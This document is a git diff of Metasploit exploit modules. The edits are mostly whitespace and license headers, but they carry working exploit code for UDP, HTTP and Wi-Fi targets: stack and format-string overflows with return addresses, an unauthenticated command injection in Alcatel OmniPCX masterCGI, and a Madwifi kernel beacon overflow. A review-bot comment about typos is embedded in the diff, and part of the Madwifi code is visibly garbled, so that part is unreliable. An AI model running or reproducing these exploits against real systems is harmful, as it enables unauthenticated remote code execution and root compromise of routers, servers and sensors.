@@ -55,70 +51,70 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => 'linux', - 'Targets' => + 'Targets' => [ ['UT2004 Linux Build 3120', { 'Rets' => [ 0x0884a33b, 0x08963460 ] }], #JMP ESP , (free/realloc) BSS pointer ['UT2004 Linux Build 3186', { 'Rets' => [ 0x088c632f, 0x089eb2f0 ] }], ], 'DisclosureDate' => 'Jun 18 2004')) - register_options( - [ - Opt::RPORT(7787) - ], self.class) + register_options( + [ + Opt::RPORT(7787) + ], self.class) end - + def exploit connect_udp - + buf = make_nops(1024) buf[24, 4] = [target['Rets'][1]].pack('V') buf[44, 4] = [target['Rets'][0]].pack('V') - buf[56, 4] = [target['Rets'][1]].pack('V') + buf[56, 4] = [target['Rets'][1]].pack('V') buf[48, 6] = "\x8d\x64\x24\x0c\xff\xe4" #LEA/JMP - + buf[0, 8] = "\\secure\\" buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded - - udp_sock.put(buf) - + + udp_sock.put(buf) + handler disconnect_udp end - + def ut_version connect_udp udp_sock.put("\\basic\\") res = udp_sock.recvfrom(8192) - disconnect_udp - + disconnect_udp + if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/))) return m[1] end - + return end - + def check vers = ut_version - + if (not vers) print_status("Could not detect Unreal Tournament Server") return end - + print_status("Detected Unreal Tournament Server Version: #{vers}") if (vers =~ /^(3120|3186|3204)$/) print_status("This system appears to be exploitable") return Exploit::CheckCode::Appears end - - + + if (vers =~ /^(2...)$/) print_status("This system appears to be running UT2003") return Exploit::CheckCode::Detected end - + print_status("This system appears to be patched") return Exploit::CheckCode::Safe end diff --git a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb index 5a013902c0..05c203611c 100644 --- a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb +++ b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb 
@@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution', 'Description' => %q{ - This module abuses a metacharacter injection vulnerability in the + This module abuses a metacharacter injection vulnerability in the HTTP management interface of the Alcatel-Lucent OmniPCX Enterprise Communication Server 7.1 and earlier. The Unified Maintenance Tool contains a 'masterCGI' binary which allows an unauthenticated attacker @@ -42,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm' ], ], 'Platform' => ['unix'], - 'Arch' => ARCH_CMD, + 'Arch' => ARCH_CMD, 'Privileged' => false, 'Payload' => { @@ -54,27 +52,27 @@ class Metasploit3 < Msf::Exploit::Remote 'RequiredCmd' => 'generic' } }, - 'Targets' => + 'Targets' => [ [ 'Automatic Target', { }] ], 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(443), - OptBool.new('SSL', [true, 'Use SSL', true]), - ], self.class) + + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [true, 'Use SSL', true]), + ], self.class) end - + def exploit connect cmd = payload.encoded.gsub(" ", '${IFS}') - req = + req = "GET /cgi-bin/masterCGI?ping=nomip&user=;#{cmd}; HTTP/1.1\r\n" + "Host: #{rhost}\r\n\r\n" - + print_status("Sending GET request with command line payload...") sock.put(req) 
diff --git a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb index 3554eb0a3f..184eb8595f 100644 --- a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb +++ b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb @@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking @@ -22,10 +20,10 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'DD-WRT HTTP Daemon Arbitrary Command Execution', 'Description' => %q{ - This module abuses a metacharacter injection vulnerability in the - HTTP management server of wireless gateways running DD-WRT. This flaw - allows an unauthenticated attacker to execute arbitrary commands as - the root user account. + This module abuses a metacharacter injection vulnerability in the + HTTP management server of wireless gateways running DD-WRT. This flaw + allows an unauthenticated attacker to execute arbitrary commands as + the root user account. }, 'Author' => [ 'gat3way', 'hdm' ], 'License' => MSF_LICENSE, @@ -56,10 +54,10 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(80) - ], self.class) + register_options( + [ + Opt::RPORT(80) + ], self.class) end def exploit @@ -80,4 +78,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/linux/http/gpsd_format_string.rb b/modules/exploits/linux/http/gpsd_format_string.rb index 99f3f6e5f4..c9a34f535a 100644 --- a/modules/exploits/linux/http/gpsd_format_string.rb +++ b/modules/exploits/linux/http/gpsd_format_string.rb 
@@ -1,5 +1,15 @@ -require 'msf/core' +## +# $Id$ +## +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -7,12 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Berlios GPSD Format String Vulnerability', 'Description' => %q{ - This module exploits a format string vulnerability in the Berlios GPSD server. + This module exploits a format string vulnerability in the Berlios GPSD server. This vulnerability was discovered by Kevin Finisterre. - }, 'Author' => [ 'Yann Senotier ' ], 'License' => MSF_LICENSE, 
@@ -34,52 +43,53 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00\x0a\x0d\x0c", }, - 'Targets' => + 'Targets' => [ - - [ 'gpsd-1.91-1.i386.rpm', { 'Syslog' => 0x0804f250, 'Ret' => 0x41424344 }, ], - [ 'gpsd-1.92-1.i386.rpm', { 'Syslog' => 0x0804f630, 'Ret' => 0x41424344 }, ], - [ 'gpsd-1.93-1.i386.rpm', { 'Syslog' => 0x0804e154, 'Ret' => 0x41424344 }, ], - [ 'gpsd-1.94-1.i386.rpm', { 'Syslog' => 0x0804f260, 'Ret' => 0x41424344 }, ], - [ 'gpsd-1.95-1.i386.rpm', { 'Syslog' => 0x0804f268, 'Ret' => 0x41424344 }, ], - [ 'gpsd-1.96-1.i386.rpm', { 'Syslog' => 0x41424344, 'Ret' => 0x41424344 }, ], - [ 'gpsd-1.97-1.i386.rpm', { 'Syslog' => 0x0804b14c, 'Ret' => 0x41424344 }, ], - [ 'gpsd-2.1-1.i386.rpm', { 'Syslog' => 0x0804c7a0, 'Ret' => 0x41424344 }, ], - [ 'gpsd-2.2-1.i386.rpm', { 'Syslog' => 0x0804c7a0, 'Ret' => 0x41424344 }, ], - [ 'gpsd-2.3-1.i386.rpm', { 'Syslog' => 0x0804c730, 'Ret' => 0xbfffd661 }, ], - [ 'gpsd-2.4-1.i386.rpm', { 'Syslog' => 0x0804c7b8, 'Ret' => 0xbfffde71 }, ], - [ 'gpsd-2.5-1.i386.rpm', { 'Syslog' => 0x0804c7dc, 'Ret' => 0xbfffdc09 }, ], - [ 'gpsd-2.6-1.i386.rpm', { 'Syslog' => 0x0804c730, 'Ret' => 0xbffff100 }, ], - [ 'gpsd-2.7-1.i386.rpm', { 'Syslog' => 0x0804c5bc, 'Ret' => 0xbfffcabc }, ], - [ 'gpsd_2.6-1_i386.deb', { 'Syslog' => 0x0804c7c4, 'Ret' => 0xbfffedc8 }, ], - [ 'gpsd_2.7-1_i386.deb', { 'Syslog' => 0x0804c6c4, 'Ret' => 0xbfffc818 }, ], - [ 'gpsd_2.7-2_i386.deb', { 'Syslog' => 0x0804c770, 'Ret' => 0xbfffee70 }, ], - [ 'SuSE 9.1 compiled 2.0', { 'Syslog' => 0x0804c818, 'Ret' => 0xbfffe148 }, ], - [ 'Slackware 9.0 compiled 2.0', { 'Syslog' => 0x0804b164, 'Ret' => 0xbfffd7d6 }, ], - [ 'Slackware 9.0 compiled 2.7', { 'Syslog' => 0x0804c3ec, 'Ret' => 0xbfffe65c }, ], - [ 'Debug ', { 'Syslog' => 0x41424344, 'Ret' => 0xdeadbeef }, ], - + [ 'gpsd-1.91-1.i386.rpm', { 'Syslog' => 0x0804f250, 'Ret' => 0x41424344 }, ], + [ 'gpsd-1.92-1.i386.rpm', { 'Syslog' => 0x0804f630, 'Ret' => 0x41424344 }, ], + [ 'gpsd-1.93-1.i386.rpm', { 
'Syslog' => 0x0804e154, 'Ret' => 0x41424344 }, ], + [ 'gpsd-1.94-1.i386.rpm', { 'Syslog' => 0x0804f260, 'Ret' => 0x41424344 }, ], + [ 'gpsd-1.95-1.i386.rpm', { 'Syslog' => 0x0804f268, 'Ret' => 0x41424344 }, ], + [ 'gpsd-1.96-1.i386.rpm', { 'Syslog' => 0x41424344, 'Ret' => 0x41424344 }, ], + [ 'gpsd-1.97-1.i386.rpm', { 'Syslog' => 0x0804b14c, 'Ret' => 0x41424344 }, ], + [ 'gpsd-2.1-1.i386.rpm', { 'Syslog' => 0x0804c7a0, 'Ret' => 0x41424344 }, ], + [ 'gpsd-2.2-1.i386.rpm', { 'Syslog' => 0x0804c7a0, 'Ret' => 0x41424344 }, ], + [ 'gpsd-2.3-1.i386.rpm', { 'Syslog' => 0x0804c730, 'Ret' => 0xbfffd661 }, ], + [ 'gpsd-2.4-1.i386.rpm', { 'Syslog' => 0x0804c7b8, 'Ret' => 0xbfffde71 }, ], + [ 'gpsd-2.5-1.i386.rpm', { 'Syslog' => 0x0804c7dc, 'Ret' => 0xbfffdc09 }, ], + [ 'gpsd-2.6-1.i386.rpm', { 'Syslog' => 0x0804c730, 'Ret' => 0xbffff100 }, ], + [ 'gpsd-2.7-1.i386.rpm', { 'Syslog' => 0x0804c5bc, 'Ret' => 0xbfffcabc }, ], + [ 'gpsd_2.6-1_i386.deb', { 'Syslog' => 0x0804c7c4, 'Ret' => 0xbfffedc8 }, ], + [ 'gpsd_2.7-1_i386.deb', { 'Syslog' => 0x0804c6c4, 'Ret' => 0xbfffc818 }, ], + [ 'gpsd_2.7-2_i386.deb', { 'Syslog' => 0x0804c770, 'Ret' => 0xbfffee70 }, ], + [ 'SuSE 9.1 compiled 2.0', { 'Syslog' => 0x0804c818, 'Ret' => 0xbfffe148 }, ], + [ 'Slackware 9.0 compiled 2.0', { 'Syslog' => 0x0804b164, 'Ret' => 0xbfffd7d6 }, ], + [ 'Slackware 9.0 compiled 2.7', { 'Syslog' => 0x0804c3ec, 'Ret' => 0xbfffe65c }, ], + [ 'Debug ', { 'Syslog' => 0x41424344, 'Ret' => 0xdeadbeef }, ], ], 'DisclosureDate' => 'May 25 2005')) - - register_options( [ Opt::RPORT(2947) ], self.class ) + + register_options( + [ + Opt::RPORT(2947) + ], self.class) end def exploit connect print_status("Trying target #{target.name}...") - + offset = 17 dump_fmt = 7 al = 3 - + hi = (target.ret >> 0) & 0xffff lo = (target.ret >> 16) & 0xffff - + shift0 = sprintf("%d",hi) - sprintf("%d",offset) - (dump_fmt * 8 + 16 + al) shift1 = (sprintf("%d",0x10000) + sprintf("%d",lo)) - sprintf("%d",hi) - + buf = "A" * 3 + "B" * 4 buf += 
[ target['Syslog']].pack('V') buf += "B" * 4 @@ -88,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote buf += make_nops(3000) + payload.encoded sock.put(buf) - + handler disconnect end diff --git a/modules/exploits/linux/http/linksys_apply_cgi.rb b/modules/exploits/linux/http/linksys_apply_cgi.rb index 37daf74363..93e78470f8 100644 --- a/modules/exploits/linux/http/linksys_apply_cgi.rb +++ b/modules/exploits/linux/http/linksys_apply_cgi.rb @@ -1,5 +1,15 @@ -require 'msf/core' +## +# $Id$ +## +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -7,10 +17,10 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Linksys apply.cgi buffer overflow', 'Description' => %q{ - This module exploits a stack overflow in apply.cgi on the Linksys WRT54G and WRT54GS routers. + This module exploits a stack overflow in apply.cgi on the Linksys WRT54G and WRT54GS routers. According to iDefense who discovered this vulnerability, all WRT54G versions prior to 4.20.7 and all WRT54GS version prior to 1.05.2 may be be affected. }, @@ -31,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Arch' => ARCH_MIPSLE, 'Platform' => 'linux', - 'Targets' => + 'Targets' => [ # the middle of the intersection is our generic address #((addrs.map { |n, h| [h["Bufaddr"],n] }.max[0] + addrs.map { |n, h| [h["Bufaddr"],n] }.min[0]+9500)/2).to_s(16) 
@@ -45,17 +55,17 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Sep 13 2005', 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(80), - Opt::RHOST('192.168.1.1') - ], self.class) + + register_options( + [ + Opt::RPORT(80), + Opt::RHOST('192.168.1.1') + ], self.class) end + # Approx size of the remaining space in the data segment after our buffer + DataSegSize = 0x4000 -# Approx size of the remaining space in the data segment after our buffer -DataSegSize=0x4000 def exploit c = connect @@ -73,15 +83,15 @@ DataSegSize=0x4000 # | <- 10000 -> | **************************** Pad with return address *********************** # I know this is horrible :( - On the other side this is very generic :) post_data = "\x00"*(10000-payload.encoded.length)+payload.encoded+addr*(DataSegSize/4) - + #post_data = "\x00"*(10000-payload.encoded.length)+payload.encoded+original+addr*2#+"\x24\xad\x43" -# res = send_request_cgi({ 'uri' => "/apply.cgi", +# res = send_request_cgi({ 'uri' => "/apply.cgi", # 'method' => 'POST', # 'data' => post_data }); # print_status("Malicious request sent, do_ej should be overwritten") - - req = c.request_cgi({ 'uri' => "/apply.cgi", + + req = c.request_cgi({ 'uri' => "/apply.cgi", 'method' => 'POST', 'data' => post_data }) c.send_request(req) diff --git a/modules/exploits/linux/http/peercast_url.rb b/modules/exploits/linux/http/peercast_url.rb index 3501ee35da..301289c3d1 100644 --- a/modules/exploits/linux/http/peercast_url.rb +++ b/modules/exploits/linux/http/peercast_url.rb 
@@ -3,29 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)', 'Description' => %q{ - This module exploits a stack overflow in PeerCast <= v0.1216. + This module exploits a stack overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters. - }, 'Author' => [ 'MC' ], 'License' => BSD_LICENSE, @@ -47,29 +44,31 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => 'linux', 'Arch' => ARCH_X86, - 'Targets' => + 'Targets' => [ ['PeerCast v0.1212 Binary', { 'Ret' => 0x080922f7 }], ], 'DisclosureDate' => 'Mar 8 2006')) - - register_options( [ Opt::RPORT(7144) ], self.class ) + + register_options([ + Opt::RPORT(7144) + ], self.class) end def exploit connect - + pat = rand_text_alphanumeric(780) pat << [target.ret].pack('V') pat << payload.encoded uri = '/stream/?' + pat - + res = "GET #{uri} HTTP/1.0\r\n\r\n" - + print_status("Trying target address 0x%.8x..." % target.ret) sock.put(res) - + handler disconnect end diff --git a/modules/exploits/linux/ids/snortbopre.rb b/modules/exploits/linux/ids/snortbopre.rb index 8c380ff1b3..9612b0aabc 100644 --- a/modules/exploits/linux/ids/snortbopre.rb +++ b/modules/exploits/linux/ids/snortbopre.rb 
@@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking @@ -22,10 +20,10 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Snort Back Orifice Pre-Preprocessor Remote Exploit', 'Description' => %q{ - This module exploits a stack overflow in the Back Orifice pre-processor module - included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could - be used to completely compromise a Snort sensor, and would typically gain an attacker - full root or administrative privileges. + This module exploits a stack overflow in the Back Orifice pre-processor module + included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could + be used to completely compromise a Snort sensor, and would typically gain an attacker + full root or administrative privileges. }, 'Author' => 'KaiJern Lau ', 'License' => BSD_LICENSE, @@ -39,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'Payload' => { - 'Space' => 1073, #ret : 1069 + 'Space' => 1073, #ret : 1069 'BadChars' => "\x00", }, 'Targets' => @@ -54,14 +52,13 @@ class Metasploit3 < Msf::Exploit::Remote ], ], 'DefaultTarget' => 0)) - + # Configure the default port to be 9080 register_options( [ Opt::RPORT(9080), ], self.class) - end def msrand(seed) 
@@ -90,20 +87,20 @@ class Metasploit3 < Msf::Exploit::Remote def exploit connect_udp - - boheader = + + boheader = "*!*QWTY?" + [1096].pack("V") + # Length ,thanx Russell Sanford "\xed\xac\xef\x0d"+ # ID "\x01" # PING - + filler = make_nops(1069 -(boheader.length + payload.encode.length)) udp_sock.write( bocrypt(boheader+payload.encode+filler+[target.ret].pack('V')) ) - + handler disconnect_udp end diff --git a/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb b/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb index b2c50e3041..ba6815834a 100644 --- a/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb +++ b/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb @@ -1,5 +1,16 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + # Madwifi remote kernel exploit -# 100% reliable, does'nt crash wifi stack, can exploit +# 100% reliable, doesn't crash wifi stack, can exploit # same target multiple times # # Julien TINNES 
@@ -9,77 +20,88 @@ # # ieee80211_ioctl_giwscan -> ieee80211_scan_iterate -> sta_iterate -> giwscan_cb # + require 'msf/core' require 'metasm' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Lorcon2 def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Madwifi SIOCGIWSCAN Buffer Overflow', 'Description' => %q{ -The Madwifi driver under Linux is vulnerable to a remote kernel-mode -stack-based buffer overflow. + The Madwifi driver under Linux is vulnerable to a remote kernel-mode + stack-based buffer overflow. -The vulnerability is triggered by one of these properly crafted . -information element: WPA, RSN, WME and Atheros OUI Current madwifi . -driver (0.9.2) and and all madwifi-ng drivers since r1504 are . -vulnerable . + The vulnerability is triggered by one of these properly crafted + information element: WPA, RSN, WME and Atheros OUI Current madwifi + driver (0.9.2) and and all madwifi-ng drivers since r1504 are + vulnerable -Madwifi 0.9.2.1 release corrects the issue. + Madwifi 0.9.2.1 release corrects the issue. -This module has been tested against Ubuntu 6.10 and is 100% reliable, -does'nt crash the Wifi stack and can exploit the same machine multiple -time without the need to reboot it. + This module has been tested against Ubuntu 6.10 and is 100% reliable, + doesn\'t crash the Wifi stack and can exploit the same machine multiple + time without the need to reboot it. -This module depends on the Lorcon2 library and only works on the Linux -platform with a supported wireless card. Please see the Ruby Lorcon2 -documentation (external/ruby-lorcon/README) for more information. - }, - - 'Author' => + This module depends on the Lorcon2 library and only works on the Linux + platform with a supported wireless card. Please see the Ruby Lorcon2 + documentation (external/ruby-lorcon/README) for more information. 
+ }, + 'Author' => [ - 'Julien Tinnes ', - 'Laurent Butti <0x9090 at gmail.com>' + 'Julien Tinnes ', + 'Laurent Butti <0x9090 at gmail.com>' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'Targets' => - [ - ['Ubuntu 6.10', { 'JMPESP' => 0xffffe777, 'scan_iterate_ra' => "0x8014401" }], - ['Generic (you need non randomized vdso)', { 'JMPESP' => 0xffffe777, 'scan_iterate_ra' => nil }] - ], - # 'Stance' => Msf::Exploit::Stance::Passive, - 'Payload' => { - #'Space' => 65, - # Metasploit does'nt support dynamic size payloads - # so we will handle this in metasm instead and ask for - # the smaller payload possible - #'Encoder' => Msf::Encoder::Type::Raw, - 'DisableNops' => true }, - - 'Platform' => 'linux', - 'Arch' => [ ARCH_X86], - 'References' => + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => [ ['CVE', '2006-6332'], ['OSVDB', '31267'], - ['URL', 'http://www.madwifi.org'], - ] - )) - register_options( + ['URL', 'http://www.madwifi.org'] + ], + #'Stance' => Msf::Exploit::Stance::Passive, + 'Platform' => 'linux', + 'Arch' => [ ARCH_X86 ], + 'Payload' => + { + #'Space' => 65, + # Metasploit doesn't support dynamic size payloads + # so we will handle this in metasm instead and ask for + # the smaller payload possible + #'Encoder' => Msf::Encoder::Type::Raw, + 'DisableNops' => true + }, + 'Targets' => [ + [ 'Ubuntu 6.10', + { + 'JMPESP' => 0xffffe777, + 'scan_iterate_ra' => "0x8014401" + } + ], + + [ 'Generic (you need non randomized vdso)', + { + 'JMPESP' => 0xffffe777, + 'scan_iterate_ra' => nil + } + ] + ] + )) + + register_options( + [ OptBool.new('SINGLESHOT', [ true, "Break after first victim (for msfcli)", 'false']), OptString.new('SSID', [ true, "The SSID of the emulated access point", 'test']), OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 600]), OptInt.new('LENGTH', [ true, "Length after local variables in giwscan_cb() to overwrite", 24]), OptString.new('ADDR_DST', [ true, "The MAC address of the 
target system", 'FF:FF:FF:FF:FF:FF']), - ], self.class) - + ], self.class) end def exploit 
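Review bot: The typo fix inside the `%q{ ... }` Description block introduces a stray backslash: a `%q{}` literal only unescapes `\\` and its delimiter, so `doesn\'t crash the Wifi stack` keeps the backslash and it will show up verbatim in the module's description text; write `doesn't crash the Wifi stack`, as the previous hunk already does for the plain `#` header comment. While the paragraph is being reindented, the sentence `driver (0.9.2) and and all madwifi-ng drivers since r1504 are vulnerable` still carries the doubled `and` and lacks a period after `Atheros OUI`, which would be worth fixing in the same pass.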
@@ -109,30 +131,33 @@ documentation (external/ruby-lorcon/README) for more information. print_status("Completed sending #{count} beacons.") end -def create_beacon - ssid = datastore['SSID'].to_s - bssid = Rex::Text.rand_text(6) - channel = datastore['CHANNEL'].to_i - len = datastore['LENGTH'].to_i - seq = [rand(255)].pack('n') - jmpesp = target['JMPESP'] # jmp esp in vdso - scan_iterate_ra=target['scan_iterate_ra'] # address just after the call - # in ieee80211_scan_iterate in wlan.ko - if scan_iterate_ra - howtoreturn="RETURN_PROPERLY" # Return to the parent of giwscan_cb parent - else - howtoreturn="RETURN_BADLY" # Return to userland with IRET - end - bssiwlist = 0x0804ddd0 + def create_beacon - stacksize="STACK_8K" - getregs="CALCULATE" - #getregs="IWANTTOSCANMANUALLY" - reg_cs="0x73" - reg_ss="0x7b" + ssid = datastore['SSID'].to_s + bssid = Rex::Text.rand_text(6) + channel = datastore['CHANNEL'].to_i + len = datastore['LENGTH'].to_i + seq = [rand(255)].pack('n') + jmpesp = target['JMPESP'] # jmp esp in vdso + scan_iterate_ra=target['scan_iterate_ra'] # address just after the call + # in ieee80211_scan_iterate in wlan.ko -wiframe = Metasm::Shellcode.assemble Metasm::Ia32.new, <(('172.24.94.252'.split('.').reverse.inject(0) { |ip, byte| (ip << 8) | byte.to_i }) ^ 0xffffffff) + #, 'monadresseip'=>(('172.24.94.252'.split('.').reverse.inject(0) { |ip, byte| (ip << 8) | byte.to_i }) ^ 0xffffffff) -#puts value[-10..-1].unpack('C*').map { |i| i.to_s 16 }.join(',') + #puts value[-10..-1].unpack('C*').map { |i| i.to_s 16 }.join(',') -if (len == 24 and value.length != 198) - raise "Value is too big! #{value.length}" -end + if (len == 24 and value.length != 198) + raise "Value is too big! 
#{value.length}" + end - buf = "\xdd" + value.length.chr + value + buf = "\xdd" + value.length.chr + value - frame = + frame = "\x80" + # type/subtype "\x00" + # flags - "\x00\x00" + # duration + "\x00\x00" + # duration eton(datastore['ADDR_DST']) + # dst bssid + # src bssid + # bssid - seq + # seq + seq + # seq Rex::Text.rand_text(8) + # timestamp value "\x64\x00" + # beacon interval "\x01\x00" + # capabilities - - # ssid IE - "\x00" + ssid.length.chr + ssid + - # supported rates IE - "\x01\x08\x82\x84\x8b\x96\x0c\x18\x30\x48" + + # ssid IE + "\x00" + ssid.length.chr + ssid + - # channel IE - "\x03" + "\x01" + channel.chr + + # supported rates IE + "\x01\x08\x82\x84\x8b\x96\x0c\x18\x30\x48" + - # invalid wpa IE buffer overflow - # wpa ie is an example, still valid for other IEs - buf + # channel IE + "\x03" + "\x01" + channel.chr + - return frame + # invalid wpa IE buffer overflow + # wpa ie is an example, still valid for other IEs + buf + + return frame end end diff --git a/modules/exploits/linux/mysql/mysql_yassl_getname.rb b/modules/exploits/linux/mysql/mysql_yassl_getname.rb index 301f506549..faa6d20cf0 100644 --- a/modules/exploits/linux/mysql/mysql_yassl_getname.rb +++ b/modules/exploits/linux/mysql/mysql_yassl_getname.rb @@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking @@ -80,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 25 2010')) - register_options([ Opt::RPORT(3306) ], self) + register_options([ Opt::RPORT(3306) ], self) end def exploit diff --git a/modules/exploits/linux/mysql/mysql_yassl_hello.rb b/modules/exploits/linux/mysql/mysql_yassl_hello.rb index d15a05eebb..b5acddf347 100644 --- a/modules/exploits/linux/mysql/mysql_yassl_hello.rb +++ b/modules/exploits/linux/mysql/mysql_yassl_hello.rb 
@@ -3,28 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'MySQL yaSSL SSL Hello Message Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in the yaSSL (1.7.5 and earlier) - implementation bundled with MySQL <= 6.0. By sending a specially crafted - Hello packet, an attacker may be able to execute arbitrary code. + implementation bundled with MySQL <= 6.0. By sending a specially crafted + Hello packet, an attacker may be able to execute arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -43,16 +41,19 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00\x20\x0a\x0d\x2f\x2b\x0b\x5c", }, 'Platform' => 'linux', - 'Targets' => + 'Targets' => [ - [ 'MySQL 5.0.45-Debian_1ubuntu3.1-log', { 'Ret' => 0x085967fb } ], + [ 'MySQL 5.0.45-Debian_1ubuntu3.1-log', { 'Ret' => 0x085967fb } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 4 2008')) - register_options([ Opt::RPORT(3306)], self.class) + register_options( + [ + Opt::RPORT(3306) + ], self.class) end - + def exploit connect diff --git a/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb b/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb index a237ec40a1..d714953138 100644 --- a/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb +++ b/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb 
@@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -16,14 +20,14 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow', 'Description' => %q{ - This exploit takes advantage of a stack based overflow. Once the stack + This exploit takes advantage of a stack based overflow. Once the stack corruption has occured it is possible to overwrite a pointer which is - later used for a memcpy. This gives us a write anything anywhere condition + later used for a memcpy. This gives us a write anything anywhere condition similar to a format string vulnerability. NOTE: The popsubfolders option is a non-default setting. - I chose to overwrite the GOT with my shellcode and return to it. This + I chose to overwrite the GOT with my shellcode and return to it. This defeats the VA random patch and possibly other stack protection features. Tested on gentoo-sources Linux 2.6.16. Although Fedora CORE 5 ships with @@ -64,18 +68,18 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - + connect print_status "Banner: #{banner = sock.gets}" # NOTE: orig poc shellcode len: 84 - + # kcope: 352+84+86+4 